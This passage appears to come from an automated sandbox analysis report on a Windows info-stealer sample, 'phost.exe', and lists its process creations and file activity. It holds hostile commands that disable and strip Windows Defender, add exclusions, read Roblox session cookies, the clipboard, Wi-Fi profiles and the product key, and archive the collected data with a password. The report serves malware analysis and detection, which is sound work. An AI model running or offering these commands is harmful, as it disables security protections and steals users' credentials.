              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3020:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:404:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1908:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7600:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
              Source: C:\Users\user\Desktop\phost.exe | Mutant created: \Sessions\1\BaseNamedObjects\z
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_03
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202
              Source: phost.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\phost.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\phost.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: phost.exe | ReversingLabs: Detection: 34%
              Source: phost.exe | String found in binary or memory: set-addPolicy
              Source: phost.exe | String found in binary or memory: id-cmc-addExtensions
              Source: C:\Users\user\Desktop\phost.exe | File read: C:\Users\user\Desktop\phost.exe
              Source: unknown | Process created: C:\Users\user\Desktop\phost.exe "C:\Users\user\Desktop\phost.exe"
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Users\user\Desktop\phost.exe "C:\Users\user\Desktop\phost.exe"
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'"
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline"
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\phost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE0B.tmp" "c:\Users\user\AppData\Local\Temp\jnxiphgt\CSC11F91C33F0BB4EC3B771882E34D952E.TMP"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
